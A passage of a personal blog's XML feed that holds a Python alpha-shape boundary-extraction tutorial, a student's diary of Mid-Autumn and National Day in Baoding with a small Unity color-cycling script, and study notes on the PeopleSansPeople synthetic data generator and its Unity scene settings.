      • it then computes the x and y coordinate for each angle from the circle's parameters. Concretely,
        • x is the center's x coordinate plus the radius times the cosine of the angle,
        • y is the center's y coordinate plus the radius times the sine of the angle.

    Finally, ax.plot draws these points joined into a circular curve. The argument 'b-' means a solid blue line, and alpha=0.1 sets the transparency to 0.1.

    This way, circles with different centers and radii can be drawn on the figure.

    def edge_check_vaild(e, tree, r, err):
        xp = e[0]
        xq = e[1]
        L = np.sqrt(np.dot(xq - xp, xq - xp))
        if L > 2 * r:
            return False, -1
        vec = (xq - xp) / L  # the unit vector from p to q
        normal = np.array([vec[1], -vec[0]])
        c1 = (xp + xq) / 2 + normal * np.sqrt(r**2 - (L/2)**2)
        c2 = (xp + xq) / 2 - normal * np.sqrt(r**2 - (L/2)**2)
        c = np.array([c1, c2])
        count = tree.query_radius(c, r=r+err, return_distance=False, count_only=True, sort_results=False)
        if count[0] <= 2:
            return True, c[0]
        elif count[1] <= 2:
            return True, c[1]
        else:
            return False, -1

    The function edge_check_vaild checks whether an edge is valid, i.e. whether the segment joining its two endpoints can lie on an empty circle of the required radius.

    It takes four arguments: e, the edge; tree, the KDTree over the point cloud; r, the circle radius; and err, the tolerance of the check.

    • The code first extracts the two endpoint coordinates xp and xq and computes the edge length L. If L exceeds 2r, the edge cannot possibly lie on such a circle, so it returns False immediately.
    • If L is at most 2r, the edge may be part of a circle. From the endpoint coordinates it computes the unit vector vec joining them and the normal vector perpendicular to it, then obtains the two candidate circle centers c1 and c2 on the perpendicular bisector.
    • Next, KDTree's query_radius counts how many points fall inside the circles of radius r+err centered at c1 and c2.
      • If a count is at most 2 (just the two endpoints), this is a valid boundary edge: return True together with the corresponding center c1 or c2.
      • If both counts exceed 2, neither circle is empty, since it contains at least a third point: return False and -1 to mark the edge invalid.
    def boundary_extract(points, alpha, err=10e-3):
        """
        The parameter err is placed here because distance computations carry
        numerical error, and this error differs for 2D point clouds at
        different scales, so it accounts for the calculation errors.
        """
        R = 1 / alpha
        pts = np.copy(points)
        tree = KDTree(pts, leaf_size=2)
        tri = Delaunay(pts)
        s = tri.simplices
        N = s.shape[0]
        i = 0
        edges = []
        centers = []
        while i <= N - 1:
            if s[i, 0] == -1:
                i = i + 1
                continue
            p3 = s[i]
            e1 = np.array([points[p3[0], :], points[p3[1], :]])
            e2 = np.array([points[p3[1], :], points[p3[2], :]])
            e3 = np.array([points[p3[0], :], points[p3[2], :]])
            e = [e1, e2, e3]
            for j in range(3):
                flag, center = edge_check_vaild(e[j], tree, R, err)
                if flag:
                    edges.append(e[j])
                    centers.append(center)
            nb = tri.neighbors[i]
            nb_valid = nb[nb != -1]
            i = i + 1
        return edges, centers

    The function boundary_extract extracts the boundary from a 2D point cloud. It takes three arguments: points, the array of point coordinates; alpha, whose reciprocal gives the circle radius (R = 1/alpha); and err, the numerical tolerance.

    • It first builds a KDTree and a Delaunay triangulation over the point cloud, then iterates over the triangles; for each of a triangle's three edges it calls edge_check_vaild to test the empty-circle condition, appending qualifying edges and their circle centers to the edges and centers lists.
    • Finally it returns the edge list and the center list.

    Note that the err parameter exists because distance computations carry numerical error. In practice, due to precision issues, the same point cloud with the same alpha can occasionally yield different results; if the extracted boundary does not match expectations, try adjusting err or regenerating the point cloud.

    def show_edge(edges, points, circle=None, r=None):
        fig = plt.figure()
        ax = fig.add_subplot(111)
        ax.scatter(*zip(*points), s=4, c='k')
        for i in range(len(edges)):
            ax.plot(*zip(*edges[i]), '-r')
        if circle is not None:
            plot_circle(circle, r, ax)
        plt.show()

    The function show_edge visualizes the extracted edges. It takes four arguments: edges, the edge list; points, the array of point coordinates; circle, the circle-center coordinates; and r, the circle radii.

    It first creates a new figure and draws the point cloud with scatter, then walks the edge list drawing each edge with plot. If circle centers and radii are given, plot_circle draws the circles as well.

    Finally, show displays the figure.

    if __name__ == "__main__":
        pts = np.random.rand(200, 2)  # generate 200 random 2D points
        alpha = 6
        edges, centers = boundary_extract(pts, alpha, err=10e-5)
        show_edge(edges, pts, circle=np.array(centers), r=np.ones(len(centers)) / alpha)

    This code first generates 200 random 2D points, then calls boundary_extract to extract the boundary from them, with alpha set to 6 and the tolerance err set to 10e-5. It then calls show_edge with the extracted edges, the points array, and the circle centers and radii to display the result.

    ]]>
    @@ -4708,7 +4708,7 @@ /posts/Exercise-%E5%AE%9E%E9%AA%8C%E7%9B%B8%E5%85%B3/ -
    ]]>
    +
    ]]>
    @@ -4770,7 +4770,7 @@ /posts/Diary-2-%E4%B8%AD%E7%A7%8B%E4%B8%8E%E5%9B%BD%E5%BA%86/ - Foreword
            

    No idea what to write as an opener, so I'll just ramble.

    jpg

    9.18-10.1

    The sky was a dull grey on 7 of the past 14 days...


    Baoding climate report:

    # y-axis data (daily temperatures and PM values)
    y1 = [20, 12, 12, 14, 16, 15, 12, 15, 15, 12, 15, 10, 8, 8] # daily low
    y2 = [31, 24, 26, 28, 28, 26, 21, 25, 26, 25, 26, 28, 26, 26] # daily high
    y3 = [59, 60, 59, 61, 63, 53, 38, 50, 65, 124, 44, 72, 28, 42] # daily PM value

    png

    Main Text

    9.21

    Dear leaders and teachers, dear new students of 2023 and fellow students of all years:
    New classmates, a new semester, a new outlook, new dreams.
    The Graduate Student Union and the Student Union of the School of Cyberspace Security and Computer Science, Hebei University, cordially invite you to the school's 2023 Welcome Gala.
    Time: September 21, 2023, 19:00-21:00
    Venue: Handan Concert Hall, Qiyi Road campus, Hebei University
    Graduate Student Union, School of Cyberspace Security and Computer Science, Hebei University
    Student Union, School of Cyberspace Security and Computer Science, Hebei University

    So the welcome gala is coming 🤔. At first I didn't feel like going, but then figured I might as well have a look.

    png

    The welcome gala

    So I dragged my roommate along to watch; after my classmates' act I decided it was getting late and slipped away. My favorite number was the crosstalk, whose delivery had a proper Hebei flavor.

    9.22

    To further enliven the academic atmosphere, strengthen high-level academic exchange, and raise the research literacy of our faculty and students, the school has invited Professor Yang Bo of Shaanxi Normal University and researcher Zhang Wenzheng of China Electronics Technology Group to give academic talks.
    1. Time: September 22, 2023, 8:30-11:00
    2. Venue: Room C1-535, new campus, Hebei University
    @everyone Enter and sign in by 8:15


    @all members This Saturday our school hosts the 17th China Symposium on Cyberspace Security Discipline Construction and Talent Cultivation; all students are to attend. Academician Shen Changxiang and deans of several renowned universities will give reports: morning in the first-floor lecture hall of the library, afternoon on the second floor (rooms 209 and 211). Be seated by 8:15 a.m. and by 1:40 p.m.

    A few points of note:
    1. Mind meeting discipline: no whispering, no phone calls, no loud talk, no wandering about.
    2. Arrive early, silence your phones, keep good order.
    3. Dress neatly; no slippers.
    4. No gaming during the meeting.
    5. Tea breaks are set up outside the hall; please be courteous and let the experts go first, then help yourselves in moderation.
    6. The visiting experts come from renowned universities; students should display the school's good conduct and the high standards expected of graduate students.


    Yet another seat-filling conference, several in a row at that... I'll just pretend I never saw the notice, hehe.


    Hebei has turned cold lately and I've apparently caught yet another cold 😅; no other discomfort, just endless sniffles and phlegm. Fourth time this year, so I'm used to it, and duly claimed my fourth bottle of strong loquat syrup of the year.


    Group meeting again in the evening, ~~listening to Wei brag~~ nothing much worth writing down.

    Next time it's my turn to report. Since Wei plans to go home, the meeting moved to next Monday.

    Around now everyone started buying tickets home for the National Day break; in my first term studying away from home, I had no thought of going back mid-holiday, let alone the sense to check tickets early.

    9.25

    Wei 😍😍😍
    Happy birthday
    Hahaha happy happy

    gif

    Roasting Wei

    Before my group-meeting report I made a point of learning Unity's DoTween plugin and wrote a little animation roasting Wei 😈, which set the whole lab laughing: Room 326 was filled with cheerful air.

    The Wei-roasting animation code
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UI;
    using DG.Tweening;
    using Unity.VisualScripting;

    public class ChangeColor : MonoBehaviour
    {
        [SerializeField] private bool isImage = true;
        private Image image;
        private Text text;

        // Start is called before the first frame update
        void Start()
        {
            if (isImage)
            {
                image = GetComponent<Image>();
                float H, S, V;
                Color.RGBToHSV(image.color, out H, out S, out V);
                changeColor(H, S, V);
            }
            else
            {
                text = GetComponent<Text>();
                float H, S, V;
                Color.RGBToHSV(text.color, out H, out S, out V);
                changeColor(H, S, V);
            }
        }

        private void changeColor(float H, float S, float V)
        {
            float newH = H + 0.01f;
            if (newH > 1)
            {
                newH = 0;
            }
            Tweener tweener = null;
            if (isImage)
            {
                tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
            }
            else
            {
                tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
            }
            tweener.OnComplete(() => changeColor(newH, S, V));
        }
    }

    But after I presented my work, my advisor felt that what I had built was not technically deep enough to squeeze a paper out of. Another round of verbal fencing with the advisor and senior students left me drenched in sweat, so I went back and showered again: two showers in one day.

    I've lost count of how many times this has eaten at me here: the feeling that everything I build is a castle in the air with no real significance, and that this lab offers too little guidance and too few resources, so nearly everything falls on me. One moment I think I should just grit my teeth and muddle the paper through; the next I wonder whether it's really worth it. Sigh. As the senior put it, this unwriteable little paper hangs overhead like the sword of Damocles.

    Wei couldn't get a ticket back to Hebei, so he refunded all his earlier ones; he truly doesn't miss home. Impressive.

    9.27

    jpg

    Breathtaking air quality

    Hebei's smog is flaring up again. What garbage!

    Oddly, the PM reading on my phone doesn't even look that high...

    jpg

    The classic snake queue

    Hebei University began handing out mooncakes, and the queue coiled like a game of Snake again, so no thanks 😅.

    jpg

    The university's salt-and-pepper mooncake

    Then at dinner the canteen started handing out mooncakes too, no queue this time; jackpot.

    No choice of flavor; I got salt-and-pepper 🤨, stamped with the university crest. Sounds like cursed cuisine but tasted fine.

    9.28

    jpg

    The geese take leave and swans fly south

    Finally sick of pounding the keyboard, I left the Qiyi Road / East 3rd Ring gate for the first time this semester.

    Watching the bustling crowd with suitcases outside the school gate: ah, the holiday is starting.

    jpg

    Quack quack quack

    Revisited Donghu Park, which I toured before first coming to the university. The lotuses have long withered; a few ducks still glide on the lake.

    jpg

    Flower bed

    Flowers laid out in the park to greet National Day.

    jpg

    Hand in hand with neighbors for Mid-Autumn, embracing the motherland for National Day

    The notion of a National Day holiday suddenly feels alien: last year locked inside campus, the year before locked out of it 😅.

    jpg

    Quack quack quack

    Ordered half a roast duck on the way back, but there was too little skin and it wasn't great 🤐, and they overdid the sweet bean sauce until it was salty-bitter.

    9.29

    My e-bike battery had charged but the bike still wouldn't run; thinking the charge hadn't taken, I went to charge it again, and while handling the battery in the morning I ran straight into Lao Tian. Ab-so-lutely suffocating. Then I got subtweeted in the big group chat 😅.

    Happy Mid-Autumn and National Day to all! To ensure everyone a safe and happy holiday, the lab safety rules are restated:
    Turn off the lights, cut the power, and lock the door when leaving; be mindful of electrical safety, use no unauthorized appliances, and charging e-bike batteries in the lab is strictly forbidden!
    Please comply strictly, and have a safe and happy holiday!

    jpg

    The disobedient bike

    Charged the battery at a repair shop outside, only to find no power getting through at all; after much probing with a multimeter the mechanic concluded the battery contact was bad 😅.

    jpg

    Admiring the Mid-Autumn sun

    Jie, who had said he wasn't going home, got a ticket after all, so: a farewell dinner 🤨.

    Watching the sunset glow on the way to Future Stone.

    jpg

    Neighbors of Beijing and Xiong'an, harmonious and beautiful Baoding

    Baoding's publicity card: neighbors of Beijing and Xiong'an, harmonious and beautiful Baoding.

    Bragging about its neighbors instead of itself.

    jpg

    Not tasty!

    Ordered frog and shrimp, but it was nothing special and overpriced; blacklist, blacklist 🤐.

    jpg

    Get!

    After dinner we amused ourselves at the claw machines. The mighty Jie grabbed another Pikachu, and in two tries I landed an ugly little milk-dragon, my first claw-machine prize ever!

    jpg

    Admiring the Mid-Autumn moon

    Stepping out to a full round moon, my first Mid-Autumn away from home, the homesickness poems memorized in childhood surfaced in my head: "The dew turns white tonight; the moon is brighter at home", "A stranger alone in a strange land, missing kin doubly on festive days", and so on. Oh wait, neither of those is actually about Mid-Autumn 😅. Watching everyone head home one by one, the thought of going home, absent before, began to surface.

    jpg

    Baoding's Hubu Alley

    The Future Stone night market even has Wuhan Hubu Alley roasted gluten; brilliant. May I suggest a Sanfang Qixiang seafood pot next.

    jpg

    Happy Mid-Autumn!

    The Future Zijinshan tower across the street wished me a happy Mid-Autumn Festival.

    10.1

    jpg

    Lychee "strange-flavor" grilled fish

    Yang's girlfriend went home, and Yang, fearing loneliness, moved back in with us.

    I had never gone out with Yang before, so the three of us decided on dinner and a movie at Future Stone again.

    Out of deference to Hunan-born Yang, we could only order the mildly spicy grilled fish. Yang said Hebei's "mild" doesn't count as spicy at all; I said Hebei's mild is unbearably spicy; and sure enough I couldn't handle it, ending up dunking bites in a bowl of water. Regional differences are very real 😅.

    Food elsewhere in Baoding is pretty cheap, but inside Wanbo and Future Stone it is genuinely expensive; it feels pricier than the Wanda in Fuzhou...

    jpg

    Movie tickets

    Then we watched a National Day release, "The Volunteers: To the War". Honestly it felt mediocre, no highlights; within the genre it falls short of "The Battle at Lake Changjin" and "Assembly".

    jpg

    Happy National Day!

    The Future Zijinshan tower across the street wished me a happy National Day.

    ]]>
    @@ -4932,7 +4932,7 @@ /posts/Paper-PEOPLESANSPEOPLE-A%20Synthetic%20Data%20Generator%20for%20Human-Centric%20Computer%20Vision/ - Resources

    Full text

    Abstract

    • Datasets for face detection and human pose estimation lack diversity and are also constrained by privacy, legal, safety, and ethics concerns.
    • The authors release PEOPLESANSPEOPLE, a human-centric synthetic data generator. It contains simulation-ready 3D human assets, a parameterized lighting and camera system, and generates 2D and 3D bounding boxes, instance and semantic segmentation, and COCO pose labels.
    • They ran benchmark synthetic-data training with a Detectron2 Keypoint R-CNN variant: pre-training the network on synthetic data and fine-tuning on real data gives gratifying results.
    • This synthetic-data pre-trained model likewise outperforms a model pre-trained on ImageNet.

    1 Introduction

    • Demand for datasets is huge.
    • Labeled data for human-centric vision tasks is increasingly complex.
    • Real datasets raise privacy and ethics issues.
    • Data for some motions is hard to collect.
    • Manual annotation is error-prone.

    The synthetic data generator designed in this paper, PEOPLESANSPEOPLE, is built on Unity and the Perception package. It includes:

    • macOS and Linux binaries able to generate large-scale datasets of over 1M images with JSON annotations
    • 28 3D human models of varying age and ethnicity, with varying clothing, hair, and skin color
    • 39 animation clips, with fully randomized humanoid placement, size, and rotation to generate varied arrangements of people;
    • fully parameterized lighting (position, color, angle, and intensity) and camera settings;
    • a set of object primitives used as distractors and occluders;
    • a set of natural images used as backgrounds and textures for objects.

    Besides the binaries above, a Unity template project is also released to lower the community's barrier to entry by helping people start building their own versions of a human-centric data generator. This environment has all the functionality described for the binaries, except that it ships with

    • 4 sample 3D human models differing only in clothing color;
    • 8 sample animation clips, with fully randomized humanoid placement, size, and rotation to generate varied arrangements of people;
    • a set of natural grocery images from the Unity Perception package, used as backgrounds and textures for objects.
    • An overview of existing synthetic data generators.

    • Domain randomization is a technique that introduces diversity into the generated data by randomizing the simulator's parameters. It has been applied to tasks including object detection, robotic manipulation, and autonomous vehicle navigation. PEOPLESANSPEOPLE lets researchers use domain-randomized synthetic data for tasks where people are part of the target classes, expanding the space of simulator capability in existing and new domains such as autonomous driving and human pose estimation and tracking.

    3 PEOPLESANSPEOPLE

    • PEOPLESANSPEOPLE is a parametric data generator with a 3D scene populated by 3D human assets in various poses and by distractor objects with natural textures. The generator is packaged as a binary that exposes several parameters for change through a simple JSON configuration file.

    • PEOPLESANSPEOPLE generates RGB images and corresponding labels for the human assets as 2D and 3D bounding boxes, semantic and instance segmentation masks, and COCO keypoint labels in JSON. It also emits scene metadata for statistical comparison and analysis.

    3.1 3D Assets

    • PEOPLESANSPEOPLE has a set of 28 scanned 3D human models from RenderPeople. The models are diverse in ethnicity and age, fully retopologized, rigged, and skinned, with high-quality textures.

    • The assets had to be modified so the clothing's material elements could be manipulated at runtime. Specifically, some of the red, green, blue, and alpha channels that make up the mask textures were repainted. In addition, a Shader Graph created in Unity allows swapping the human assets' material elements and changing the hue and texture of the clothing. These changes make it possible to import the human models into Unity, place them in the scene, animate them, and vary their clothing texture and color.

    jpg

    PEOPLESANSPEOPLE 3D Human Models.
    a) The 28 scanned 3D human models used in the environment, with default poses and clothing textures.
    b) An example of the clothing texture variation enabled by the PEOPLESANSPEOPLE shader graph.

    • To generate diverse poses for the human assets, a set of 39 animations was collected from Mixamo, from simple motions such as idling, walking, and running to more complex ones such as planking, breakdancing, and fighting. The clips were downloaded as Unity FBX at 24 frames per second with no keyframe reduction. Finally, all animation clips were retargeted to the RenderPeople human assets.

    3.2 Unity Environment

    • The authors develop PEOPLESANSPEOPLE with Unity 2020.3.20f1 and Unity's Perception package 0.9.0-preview.2. The 3D scene contains a background wall, a Perception camera, a directional light (the sun), a moving point light, and six fixed scene point lights.

    jpg

    PEOPLESANSPEOPLE Design.
    (a) Scene setup. The scene has a background wall, a Perception camera, a directional light (sun), a moving point light, and six fixed point lights.
    (b), (c) and (d) Example simulations. The small camera preview pane at the bottom right of each figure shows the Perception camera's rendered preview. The wall background texture, the point lights' color, intensity, and position, and the sun's direction change every frame. The camera's field of view, focal length, position, and orientation can change as well. Human assets spawn in front of the wall at varying scale, pose, clothing texture, and rotation about the Y axis, and primitive occluder objects spawn with varying orientation, scale, and texture.

    • Scene background and lighting. A background wall texture is picked at random from a set of 1600 natural images taken from the COCO unlabeled 2017 dataset, after making sure no humans appear in them (not even framed photos of people on a wall). The texture's hue offset is also varied, as are the color, intensity, and on/off state of the six point lights and the directional light; a further moving point light changes position and rotation. Together these eight lights produce varied illumination, shadows, and scene appearance.

    • Perception camera. The Perception camera extends the rendering process to generate annotation labels. In PEOPLESANSPEOPLE, the benchmark experiments use one object class (person), for which 2D bounding boxes and human keypoint labels are generated. With the Unity Perception package, semantic and instance segmentation masks and 3D bounding boxes can be included as well.

    • The 2D bounding boxes and human keypoints follow the COCO dataset standard. Keypoint visibility states are: $v=0$ not labeled, $v=1$ labeled but not visible, $v=2$ labeled and visible, as in COCO. The $iscrowd=1$ label is not used, however, since sub-pixel-perfect labels can be generated even in the most crowded scenes. (A small sketch of consuming these visibility flags follows the list below.)


    In total, the Perception camera gives users a choice of three labeling schemes:

    • visible objects

    • visible and occluded objects: here, a person occluded by themselves or by another object is still annotated as visible ($v=2$).

    • all objects: here, even objects falling entirely behind another object are annotated, which is particularly useful for human tracking and activity recognition.
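
    A small sketch of what the flags mean when consuming COCO-style keypoint annotations downstream (the flat x, y, v layout is the standard COCO one; the sample values are made up):

    # COCO keypoints are flat [x1, y1, v1, x2, y2, v2, ...] triplets:
    # v=0 unlabeled, v=1 labeled but not visible, v=2 labeled and visible.
    def visible_keypoints(keypoints):
        """Return the (x, y) pairs whose visibility flag is 2."""
        triplets = [keypoints[i:i + 3] for i in range(0, len(keypoints), 3)]
        return [(x, y) for x, y, v in triplets if v == 2]

    ann = [100, 50, 2, 104, 48, 1, 0, 0, 0]  # visible, occluded, unlabeled
    print(visible_keypoints(ann))            # [(100, 50)]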


    • Objects in the scene. A set of primitive 3D game objects, such as cubes, cylinders, and spheres, serves as background or occluder/distractor objects. They can spawn anywhere in the scene at arbitrary position, scale, orientation, texture, and hue offset, using the same COCO unlabeled 2017 textures as the background wall.

    3.3 Domain Randomization

    • To train models on synthetic data that generalize to the real domain, the work relies on domain randomization, in which aspects of the simulated environment are randomized to introduce variation into the synthetic data. The Unity Perception package provides a domain randomization framework: at every frame, randomizers act on predefined Unity scene components. One first supplies parameter definitions for the components to be randomized, then specifies how those parameters are distributed. Normal, uniform, and binomial distributions are provided, and custom distributions can be defined as well. For simplicity, all randomizer values in PEOPLESANSPEOPLE use uniform distributions.

    • In short, the placement and pose of 3D objects, the textures and colors of the 3D objects in the scene, the configuration and color of the lighting, the camera parameters, and some post-processing effects are randomized. Certain kinds of domain randomization, such as lighting, hue offset, and camera rotation/field of view/focal length, mimic standard data augmentation, so no data augmentation is used during synthetic-data training.
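
    The per-frame sampling pattern is easy to picture outside Unity; a minimal Python sketch of uniform-distribution domain randomization over a few parameters named in this post (the sun rotation range is an illustrative assumption; the other ranges appear in the randomizer settings later on):

    import random

    PARAMS = {                        # uniform (lo, hi) range per parameter
        "sun_rotation_deg": (0.0, 360.0),
        "light_intensity": (5000.0, 20000.0),
        "camera_fov_deg": (5.0, 50.0),
        "hue_offset_deg": (-180.0, 180.0),
    }

    def randomize_frame(rng=random):
        """Sample one value per parameter, as a randomizer does each frame."""
        return {name: rng.uniform(lo, hi) for name, (lo, hi) in PARAMS.items()}

    for frame in range(3):
        print(frame, randomize_frame())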

    Domain randomization parameters in the data generator:

    jpg

    3.4 Data Generation

    On a MacBook Pro (16-inch, 2019) equipped with:

    • 2.3 GHz 8-core Intel Core i9

    • AMD Radeon Pro 5500M 4 GB

    • Intel UHD Graphics 630 1536 MB

    • 32 GB 2667 MHz DDR4 memory


    • PEOPLESANSPEOPLE generates $10\times10^3$ images with bounding-box and keypoint labels in roughly 3 minutes.

    4 Experiments

    • Benchmark synthetic-data training with a Detectron2 Keypoint R-CNN variant: pre-train the network on synthetic data, fine-tune on real data, and compare against the COCO dataset.

    4.1 Dataset Statistics

    jpg

    Bounding-box occupancy heatmaps. The benchmark experiments use a 640×640 image size. All bounding boxes are overlaid on the image as filled boxes to compute the box-occupancy maps for COCO person and for the synthetic data.

    • The diversity is also judged better than that of the GTA-based dataset.

    jpg

    Compared with COCO, the synthetic dataset contains more instances (bounding boxes) per image.

    4.2 Training

    For all models:

    • initial learning rate set to 0.02
    • initial patience set to 38
    • initial epsilon set to 5
    • weight decay set to 0.0001
    • momentum set to 0.9
    • a linear warm-up of 1000 iterations at the start of training (both from scratch and for transfer learning), slowly raising the learning rate to the initial learning rate
    • 8 NVIDIA Tesla V100 GPUs with synchronized SGD
      • mini-batch size of 2 per GPU
    • images normalized with ImageNet's mean pixel values and standard deviation

    real-world dataset

    • The COCO train set is split into overlapping subsets
      • of 641, 6411, 32057, and 64115 images, i.e. 1%, 10%, 50%, and 100% of the COCO train set, to study few-shot transfer.
      • The smaller sets are subsets of the larger ones.
    • The person COCO validation set is used for validation during training.
    • Final model performance is reported on the COCO test-dev2017 dataset for all experiments trained on COCO data.
    • For the synthetic data, $3$ datasets of $500\times10^3$ images were generated from $3$ random seeds, each split into a $490\times10^3$ training set and a $10\times10^3$ validation set. The synthetic validation set is used to evaluate models during from-scratch training on purely synthetic data.
    • After training, the performance of these models is reported on the person COCO validation and test-dev2017 sets.

    benchmark experiments

    • First, models are trained from scratch and evaluated on the COCO validation set and the COCO test-dev2017 set.
    • Second, the weights of models trained on synthetic data are fine-tuned on limited subsets of COCO (real) data for few-shot transfer.
    • For a complete comparison, ImageNet pre-trained weights fine-tuned on the COCO data subsets are also included.
    • In few-shot transfer training, all network layers are retrained. Hyperparameters and learning-rate schedules are identical for from-scratch training and few-shot transfer learning.

    5 Results

    • Synthetic data alone still falls somewhat short, but mixing synthetic and real data works very well.

    5.1 Discussion

    • The encouraging results invite further research into hyperparameter search, optimization strategies, training schedules, and alternative training strategies to close the sim-to-real gap.

    6 Conclusion and Limitations

    • Due to RenderPeople's redistribution and licensing policy, direct access to the 3D human assets is not provided; instead, detailed instructions and examples are given for sourcing and preparing human assets for simulation. Although the pre-built PEOPLESANSPEOPLE binaries cannot do complex structured placement of assets, researchers can update the provided randomizers to allow different strategies.

    Code

    The repository provides the PeopleSansPeople Unity environment template in an HDRP version. The project includes custom randomization features and some sample human assets provided by Unity Technologies.

    The environment still offers the full functionality of PeopleSansPeople as presented in the paper and in the provided Linux and macOS binaries. Since the third-party assets carry no redistribution license, the following sample assets/content are provided instead:

    • 4 Unity-branded assets identical except for clothing color.
    • 529 Unity grocery textures.
    • 8 Unity-owned animation clips.

    The purpose of this Unity environment is to let the community start building their own versions of human-centric data generators, lowering the barrier to entry while providing all the functionality present in PeopleSansPeople. Users can easily swap their own assets and content into the project, as long as the properties match the provided samples.

    I installed Unity 2020.3.20f1 and ran PeopleSansPeople/peoplesanspeople_unity_env at main · Unity-Technologies/PeopleSansPeople (github.com) directly, but something was off: it loaded painfully slowly and kept freezing. Hmmm.

    Coming back the next day, it behaved normally.

    jpg


    HumanScene.unity contains the following objects:

    • Main Camera
    • Wall
    • Simulation Scenario
    • Post Process Volume
    • Sky and Fog Volume
    • Lights
      • DirectionalLightSun
      • PointLight1
      • PointLight2
      • PointLight3
      • PointLight4
      • PointLight5
      • PointLight6
      • PointLightSceneMoving

    Main Camera

    jpg

    Perception Camera

    • First capture at 0 seconds and consecutive captures every 0.0166 seconds of simulation time.

    • Camera Labelers

      The annotated outputs are:

      • BoundingBox2DLabeler — 2D bounding boxes

      • ObjectCountLabeler — object counts

      • RenderedObjectInfoLabeler — rendered-object info (what is this for?)

      • SemanticSegmentationLabeler — semantic segmentation

      • KeypointLabeler — keypoints

      • Animation Pose Configs — pose animations

      • InstanceSegmentationLabeler — instance segmentation

    CustomAnnotationAndMetricReporter

    This script is a custom annotation and metric reporter used when synthesizing datasets with the Perception package in Unity. Its main points:

    1. The [RequireComponent(typeof(PerceptionCamera))] attribute ensures the script is attached to a game object carrying a PerceptionCamera component. (So everything related to emitting annotations hangs off the PerceptionCamera.)
    2. It defines variables holding metric definitions, e.g. for light position, rotation, intensity, and color, plus metric definitions for camera position, rotation, field of view, and focal length.
    3. In Start(), all metric definitions are registered via DatasetCapture.RegisterMetricDefinition(), each assigned a unique ID.
    4. In Update(), it loops over the lightSources array and reports each light's position, rotation, intensity, and color with DatasetCapture.ReportMetric().
    5. It also reports the camera's position, rotation, field of view, and focal length.
    6. The commented-out code is an example of computing a target object's position in the camera's local space and reporting annotation values via GetComponent<PerceptionCamera>().SensorHandle.ReportAnnotationValues().

    In short, the script's purpose is to capture and report metrics and annotations with the Perception package in Unity, covering light and camera position, rotation, intensity, color, and so on, plus the target's bounding-box annotation (that part is commented out).

    CustomCameraRandomizerTag

    The tag marking the camera for randomization.

    Wall

    jpg

    HueOffsetRandomizerTag

    The tag for hue-offset randomization.

    TextureRandomizerTag

    The tag for texture randomization.

    Background Object

    Contains the following tags:

    • CustomBackgroundOccluderScaleRandomizerTag

      the tag for scale randomization

    • HueOffsetRandomizerTag

      the tag for hue-offset randomization

    • TextureRandomizerTag

      the tag for texture randomization

    • RotationRandomizerTag

      the tag for rotation randomization

    Foreground Object

    jpg

    Has:

    • Shader Graph Texture Randomizer Tag

      shader-texture randomization

    • Rotation Randomizer Tag

      rotation randomization

    • Custom Foreground Rotation Randomizer

      foreground rotation randomization (which, I think, overrides the tag above)

    • Labeling

      • carries the person and pose labels
    • Animation Randomizer Tag

      animation randomization

    • CustomForegroundScaleRandomizerTag

      foreground scale randomization

    • Keypoint Occlusion Overrides

      • Overrides the default occlusion distance values by a scalar. This is necessary for bodies with different body types (i.e. children should be less than one).

    Simulation Scenario

    jpg

    Fixed Length Scenario

    Scenario Properties

    A Scenario controls the simulation's execution flow by applying randomization parameters. Make sure only one scenario is ever active in the scene.

    Randomizers

    Randomizers execute in the order below. You can reorder them by dragging a randomizer up or down by its handle.

    • CustomBackgroundObjectPlacementRandomizer

      • Controls background-object placement; the X and Y axes range over $[-7.5, 7.5]$, and Depth Value (the Z axis) over $[-10, 14]$.
      • Background objects are spaced at least $2.5$ apart.
    • CustomBackgroundOccluderScaleRandomizer

      • Controls background-object scale, in $[1, 12]$.
    • CustomForegroundObjectPlacementRandomizer

      • Controls foreground-object placement; the X and Y axes range over $[-7.5, 7.5]$, and Depth Value (the Z axis) over $[-9, 6]$.
      • Foreground objects are spaced at least 3 apart.
    • CustomForegroundScaleRandomizer

      • Controls foreground-object scale, in $[0.5, 3]$.
    • TextureRandomizer

      • Picks one texture at random from a list.
    • HueOffsetRandomizer

      • Hue-offset range: $[-180, 180]$
    • RotationRandomizer

      • The X, Y, and Z axes all spin freely over $[0, 360]$.
    • CustomForegroundRotationRandomizer

      • Restricts the free $[0, 360]$ rotation to the Y axis only, presumably to keep the generated people's feet pointing straight down.
    • SunAngleRandomizer

      • Randomizes the sunlight's
        • hour
        • day of year
        • latitude
    • AnimationRandomizer

      • Randomizes the animation; the related logic seems to live in AnimationRandomizerTag.cs?
    • ShaderGraphTextureRandomizer

      • Picks one item at random from a list for each of the following textures / materials:

        • Albedo Texture

        • Normal Texture

        • Mask Texture

        • Character Material

    • CustomCameraRandomizer

      • Camera Field Of View Parameter

        field-of-view randomization range $[5, 50]$

      • Camera Focal Length Parameter

        focal-length randomization range $[1, 23]$

      • Multiply Factor: $5$

        • Change Camera Position: $1$

          positional offset from the initial position, $[-5, 5]$ per axis

        • Change Camera Rotation: $1$

          rotational offset from the initial rotation, $[-5, 5]$ per axis

    • CustomLightRandomizer

      • Light Intensity Parameter
        • range $[0, 1]$, further multiplied by a factor in CustomLightRandomizerTag, so the final intensity range is $[5000, 20000]$
      • Light Color Parameter
        • RGB in $[0, 1]$, with opacity A fixed at 1
      • Aux Parameter
        • an auxiliary parameter of unclear purpose, range $[0, 1]$
    • CustomLightPositionRotationRandomizer (see the arithmetic check after this list)

      • Multiply Factor: $5$
      • Random Float: $[0, 1]$
      • Change Light Position: $0.73$
        • light positional offset from the initial position: $[-3.65, 3.65]$ ($5\times 0.73=3.65$)
      • Change Light Rotation: $10$
        • rotational offset from the initial rotation: $[-50, 50]$ ($10\times5=50$)
    • CustomPostProcessVolumeRandomizer

      The post-processing randomizer

      • Vignette Intensity Parameter

        vignette intensity: $[0, 0.5]$

      • Fixed Exposure Parameter

        fixed exposure: $[5, 10]$

      • White Balance Temperature Parameter

        white-balance temperature: $[-20, 20]$

      • Film Grain Intensity Parameter

        film-grain intensity: $[0, 1]$

      • Lens Distortion Intensity Parameter

        lens-distortion intensity: $[-0.2, 0.2]$

      • Focus Distance Parameter

        depth-of-field focus distance: $[0.1, 4]$

      • Contrast Parameter

        contrast: $[-30, 30]$

      • Saturation Parameter

        saturation: $[-30, 30]$

    Post Process Volume

    jpg

    Sky and Fog Volume

